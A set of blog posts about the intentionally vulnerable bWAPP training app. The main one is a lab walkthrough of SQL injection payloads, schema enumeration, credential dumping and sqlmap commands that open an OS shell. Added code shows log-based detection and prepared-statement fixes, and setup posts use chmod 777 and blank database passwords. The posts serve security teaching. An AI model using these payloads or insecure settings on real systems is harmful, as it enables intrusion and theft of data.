Monday, January 21, 2013

bWAPP - SQL injection

Is bWAPP vulnerable to SQL injection? Yes, of course. That is the purpose of bWAPP, our extremely buggy web application. It has some nice injection issues... I made them intentionally, remember?

No... I will not explain in detail what SQL injection is!
A SQL injection attack is probably the easiest attack to prevent, while being one of the forms of attack least often protected against. The core of the attack is that a SQL command is appended to the back-end query, usually through a form field in the website or web application, with the intent of breaking out of the original SQL statement and then running the SQL statement that was injected into the form field. I'm sure you can find enough tutorials on the Internet about SQL injection. Here's an example of a pretty nice article.

Yes... I will explain how to exploit bWAPP using SQL injection and how to take ownership of the database and even the underlying operating system. Definitely!



Currently there are 5 bugs in bWAPP related to SQL injection:
  • the Search page,
    where you can search for a movie (or movies) using a search string. The movie details will be displayed as a result of your search.
  • the Select page,
    where you can select a specific movie from a drop-down list.
  • the Login page,
    where you can enter your credentials to log in.
  • the Blind SQL injection page,
    where you can also search for a movie. The application will tell you if the movie exists or not. You will not see the movie details... maybe that's the reason why I called this the Blind SQL injection page :)
  • and where is bug number 5?
    A little challenge for you... somewhere in the application there is an issue with a SQL insertion. It's up to you to tell us where. Please give us your feedback @MME_IT.



The Search page

Here you can search for a movie (or movies) using a search string. The movie details will be displayed as a result of your search. If you click the search button without entering a search string, all movies will be displayed.



The injection symptom: when entering a single quote (') in the title field we receive the following message:

'Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1'

I love that message!

Here we go for some basic SQL injection fun:

blah' or 1=1--

results in all the records:



blah' or 1=2--

results in 0 records:



So the URL parameter title is definitely susceptible to SQL injection:

http://localhost/bWAPP/sqli_1.php?title=blah'+or+1=1--%20&action=search


What's next? Do you want to view some data not intended for you? I mean some real confidential information! Of course you do, let's go...

You can use the SQL UNION operator to append the result of a second SELECT to the result set of the original query.
First of all, the injected SELECT must return the same number of columns as the original SQL statement, otherwise the UNION fails!

blah' union select 1--

results in the following message:




After a while you will discover that you should use 6 columns:

 
blah' union select 1,1,1,1,1,1--

results in:



And that's great!
Now we can play with the field order and display the name of the current database:

blah' union select 1,DATABASE(),1,1,1,1--



We have found the name of the current database: bWAPP

Now our mission is to retrieve the table names of the current database:


blah' union select 1,table_name,1,1,1,1 from INFORMATION_SCHEMA.TABLES where table_schema=database()--



We have 3 tables: blog, movies and users. I think we should go for the data in the table users :)

We want to retrieve the column names for the table users:

blah' union select 1,column_name,1,1,1,1 from INFORMATION_SCHEMA.COLUMNS where table_name='users' and table_schema=database()--



The column names login, password, email and secret look interesting. We want those values!

blah' union select 1,login,password,email,secret,1 from users--



OK, we have the values! We exploited the underlying database by retrieving some confidential data. Apparently the password is stored as a hash and cannot be read directly. Those guys from MME are doing a great job...

After 10 seconds, 1 password was already cracked using John :p



Of course, we knew that the password for user bee was bug. I'm just trying to convince you to use complex passwords!

Let's summarize, we retrieved some data that was not intended for us. We retrieved the password hashes and we cracked a password. What's next?

Right... we will take over the database and the underlying operating system. One of my favorite tools for doing that is sqlmap.

sqlmap is an open source pentesting tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections (source: sqlmap.org). It is written in Python.



We can automate the previous commands with sqlmap.

This dumps the current database version and the database names:

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --dbs




This dumps the selected columns of the users table; it even cracks the password hashes automatically:

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" -D bWAPP -T users -C login,email,password,secret --dump



Using sqlmap we also have the possibility to get a shell on the underlying operating system. Actually the tool will upload a web shell that runs your favorite OS commands. A very nice and powerful tool. Thank you Bernardo and Miroslav!

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --os-shell
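Seen from the defender's side, the probes in this walkthrough leave recognisable traces in the web server's access log. The following is an added example (not part of the original post, nor code from bWAPP or sqlmap) that URL-decodes the request of each log line and flags the payload patterns used above plus sqlmap's self-identifying User-Agent; the log lines are constructed for the example in Apache combined format.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log sample (Apache combined format) reproducing the
# requests made in this walkthrough; not a real log from any server.
SAMPLE_LOG = """\
127.0.0.1 - - [21/Jan/2013:10:00:01 +0100] "GET /bWAPP/sqli_1.php?title=Iron+Man&action=search HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
127.0.0.1 - - [21/Jan/2013:10:00:07 +0100] "GET /bWAPP/sqli_1.php?title=blah'+or+1=1--%20&action=search HTTP/1.1" 200 9832 "-" "Mozilla/5.0"
127.0.0.1 - - [21/Jan/2013:10:00:20 +0100] "GET /bWAPP/sqli_1.php?title=blah%27+union+select+1%2Ctable_name%2C1%2C1%2C1%2C1+from+INFORMATION_SCHEMA.TABLES+where+table_schema%3Ddatabase%28%29--&action=search HTTP/1.1" 200 7011 "-" "Mozilla/5.0"
127.0.0.1 - - [21/Jan/2013:10:01:00 +0100] "GET /bWAPP/sqli_1.php?title=&action=search HTTP/1.1" 200 6000 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
"""

# Apache combined format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')

# Signatures run against the URL-decoded request so that +, %27, %2C and
# friends cannot hide the payload from the pattern.
SIGNATURES = [
    ("boolean tautology", re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.I)),
    ("union-based extraction", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema enumeration", re.compile(r"\binformation_schema\.", re.I)),
]

def classify(line):
    """Parse one log line; return a dict with the findings for that request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, when, method, path, status, agent = m.groups()
    decoded = unquote_plus(path)
    findings = [name for name, rx in SIGNATURES if rx.search(decoded)]
    # sqlmap identifies itself as "sqlmap/<version> (http://sqlmap.org)" unless
    # the operator overrides the User-Agent (assumption: default settings).
    if agent.lower().startswith("sqlmap/"):
        findings.append("sqlmap default User-Agent")
    return {"ip": ip, "time": when, "path": decoded, "findings": findings}

def scan(log_text):
    """Return only the requests that triggered at least one finding."""
    hits = []
    for line in log_text.splitlines():
        rec = classify(line) if line.strip() else None
        if rec and rec["findings"]:
            hits.append(rec)
    return hits

if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["time"], rec["ip"], rec["findings"], rec["path"][:60])
```

The first sample line (a normal search for "Iron Man") produces no finding, which is the false-positive check worth keeping when you tune the patterns.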



Conclusion

SQL injection can have disastrous consequences, no doubt about it.

Feel free to test for SQL injection vulnerabilities using the bWAPP web application. As you know there are 5 different bugs related to SQL injection. You can download bWAPP from here. Don't forget to set the security level to low or medium. With security level high you will notice that SQL injection is no longer applicable: at that level every user input is validated, using the MySQL real escape string function (mysql_real_escape_string) and prepared statements.
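To make the difference between the low and high security levels concrete, here is an added example covering both the Search page walkthrough above and this conclusion: Python with SQLite standing in for bWAPP's PHP/MySQL code (this is not the project's own source), showing the search query built by string concatenation beside its prepared-statement form. The movies table, its six columns and its rows are constructed for the example to match the UNION column-count probe.

```python
import sqlite3

# Constructed stand-in for the movies table (six columns, matching the
# "union select 1,1,1,1,1,1" probe); the titles and values are made up.
MOVIES = [
    (1, "Iron Man", 2008, "action", "Tony Stark", "tt0000001"),
    (2, "Man of Steel", 2013, "action", "Clark Kent", "tt0000002"),
    (3, "The Hobbit", 2012, "fantasy", "Bilbo Baggins", "tt0000003"),
]
COLUMNS = "id, title, release_year, genre, main_character, imdb"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (id INTEGER, title TEXT, release_year INTEGER,"
                 " genre TEXT, main_character TEXT, imdb TEXT)")
    conn.executemany("INSERT INTO movies VALUES (?, ?, ?, ?, ?, ?)", MOVIES)
    return conn

def search_low(conn, title):
    """Security level low: the search string is pasted into the SQL text, so a
    quote closes the literal and the rest of the input is parsed as SQL."""
    sql = "SELECT " + COLUMNS + " FROM movies WHERE title LIKE '%" + title + "%'"
    return conn.execute(sql).fetchall()

def search_high(conn, title):
    """Security level high: a prepared statement binds the search string as a
    parameter, so quotes, OR and UNION inside it are just characters to match."""
    sql = "SELECT " + COLUMNS + " FROM movies WHERE title LIKE ?"
    return conn.execute(sql, ("%" + title + "%",)).fetchall()

def probe_columns(conn, n):
    """Reproduce the column-count guessing step against the low-level query: a
    UNION with the wrong number of columns is rejected by the database (the
    error text is returned), the right number yields the injected row."""
    payload = "blah' union select " + ",".join(["1"] * n) + "--"
    try:
        return search_low(conn, payload)
    except sqlite3.OperationalError as exc:
        return str(exc)
```

The same `blah' or 1=1--` string that returns every row from `search_low` matches nothing in `search_high`, because the bound parameter is compared as a literal title.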

If you want to know more about SQL injection and tools like sqlmap, don't hesitate to sign up for our ITSEC training. Or just invite me to your security event. It would be an honor for me to speak at your event!

Regards

Malik

Sunday, January 20, 2013

bWAPP - Samurai WTF

In one of the previous articles I described the necessary steps to install bWAPP, or a buggy web application. That was pretty easy.

In this article I will demonstrate the installation and configuration of bWAPP on the Samurai Web Testing Framework.

The Samurai Web Testing Framework is a live Linux environment that has been pre-configured to function as a web penetration testing environment. The image contains the best of the open source and free tools that focus on testing and attacking websites.

 


Once you have booted Samurai WTF you can copy the bWAPP zip file to the desktop.
Extract it there. A new directory 'bWAPP' will be created.
Syntax
cd /home/samurai/Desktop/
unzip bWAPP.zip



Move the directory 'bWAPP' and its entire content to the folder '/var/www'. You need root privileges!
Syntax
sudo su
mv /home/samurai/Desktop/bWAPP /var/www

Edit the file 'admin/settings.php'. Use the Samurai MySQL settings.
You need to change the password to 'samurai'. Yes... the password of the MySQL root user on Samurai is actually 'samurai'.



Browse to the file 'install.php' in the directory 'bWAPP'. Click 'here'.
The database 'bWAPP' will be created and populated.



Go to the login page. You can login with the default credentials (bee/bug) or you can make a new user. It's up to you!



You are ready to explore and exploit the bee!
Choose your favorite bug and a security level (low - medium - high).



If you have questions or if you want to help me with this project, don't hesitate to contact me! I speak human...

Enjoy!

Regards

Malik Mesellem
https://twitter.com/MME_IT

Monday, January 14, 2013

bWAPP - Metasploitable

In the previous article I described the necessary steps to install bWAPP, or a buggy web application. That was pretty easy.

In this article I will demonstrate the installation and configuration of bWAPP on Metasploitable.

Metasploitable is an intentionally vulnerable Linux virtual machine. The VM can also be used to provide security training, test security tools, and practice common penetration testing techniques. It runs on any recent VMware product and other virtualization technologies such as VirtualBox, VMware Fusion, Hyper-V,... Thank you HD Moore and Rapid7!



You can download the image file of Metasploitable 2 from here. The default login and password is msfadmin/msfadmin.

Once you have booted the Metasploitable VM you can copy the bWAPP zip file to the temp directory. Extract it there. A new directory 'bWAPP' will be created.
Syntax
cd /tmp
unzip bWAPP.zip



Move the directory 'bWAPP' and its entire content to the folder '/var/www'. You need root privileges!
Syntax
sudo su
mv /tmp/bWAPP /var/www

Go to the bWAPP directory and give full permission to the directories 'passwords' and 'images'. This step is optional, but it will give you so much fun when exploiting bWAPP with tools like sqlmap and Metasploit!
Syntax
cd /var/www/bWAPP
chmod 777 images/
chmod 777 passwords/


Edit the file 'admin/settings.php'. Use the Metasploitable MySQL settings.
Yeah you're right, there's nothing to change. The MySQL root user on Metasploitable has a blank password.



Browse to the file 'install.php' in the directory 'bWAPP'. Click 'here'.
The database 'bWAPP' will be created and populated.



Go to the login page. You can login with the default credentials (bee/bug) or you can make a new user. It's up to you!



You are ready to explore and exploit the bee!
Choose your favorite bug and a security level (low - medium - high).



If you have questions or if you want to help me with this project, don't hesitate to contact me! I speak human...

Enjoy!

Regards

Malik Mesellem
https://twitter.com/MME_IT

bWAPP - Installation

It is pretty easy to install bWAPP, or a buggy web application. In order to do that, you have to meet some requirements first.

These are the requirements:
  • an operating system: Windows, Linux, Unix, Mac OS,...
  • a web server (Apache, IIS,...)
  • the PHP extensions
  • a MySQL installation
  • (or you could install WAMP or XAMPP)
No! I will not explain how to install Apache/IIS, PHP and MySQL.




An overview of the installation steps:

1)  Extract the 'zip' file.
    Example
    unzip bWAPP.zip
2)  Move the directory 'bWAPP' and its entire content to the root of your web server.
3)  Give full permission to the folders 'passwords' and 'images'.
    Example
    chmod 777 passwords/
    chmod 777 images/
4)  Edit the file 'admin/settings.php' with your own database connection settings.
    Example
    $db_server = "localhost"; // your database server (IP/name), here 'localhost'
    $db_username = "root";    // your MySQL user, here 'root'
    $db_password = "";        // your MySQL password, here blank
5)  Browse to the file 'install.php' in the directory 'bWAPP'.
    Example
    http://localhost/bWAPP/install.php
6)  Click on 'here' (Click 'here' to install bWAPP).
    The database 'bWAPP' will be created and populated.
7)  Go to the login page. If you browse to the bWAPP root folder you will be redirected.
    Example
    http://localhost/bWAPP/
    http://localhost/bWAPP/login.php
8)  Login with the default credentials or make a new user.
    Default credentials: bee/bug
9)  You are ready to explore and exploit the bee!

Another option is to download bee-box. bee-box is a custom Linux VMware virtual machine pre-installed with bWAPP. bee-box gives you several ways to hack and deface the bWAPP website. It's even possible to hack the bee-box to get root access...
With bee-box you have the opportunity to explore all bWAPP vulnerabilities!

This project is part of the ITSEC GAMES project. ITSEC GAMES are a fun approach to IT security education. IT security, ethical hacking, training and fun... all mixed together.
Enjoy!

Regards

Malik Mesellem
@MME_IT

Thursday, January 10, 2013

bWAPP - Bug fixes and new features

bWAPP, or a buggy web application, is a deliberately insecure web application. It helps security enthusiasts, systems engineers, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful web application penetration testing and ethical hacking projects. It is made for educational purposes.

What makes bWAPP so unique? Well, it has over 100 web bugs! bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project.

Download bWAPP from here.



Another possibility is to download our bee-box, a custom Linux VM pre-installed with bWAPP. bee-box gives you several ways to hack and deface the bWAPP web application. It's even possible to hack the bee-box to get full root access... With bee-box you have the opportunity to explore all bWAPP vulnerabilities. Hacking, defacing and exploiting without going to jail... how cool is that!?!

Download bee-box from here.



Current version: bWAPP v2.1

Release date: 27/09/2014

Total bugs: > 100

New bugs
  • Base64 Encoding (Secret)
  • Broken Authentication - CAPTCHA Bypassing
  • Cross-Site Scripting - Stored (User-Agent)
  • iFrame Injection
  • Shellshock Vulnerability (CGI)
  • SQL Injection - Stored (User-Agent)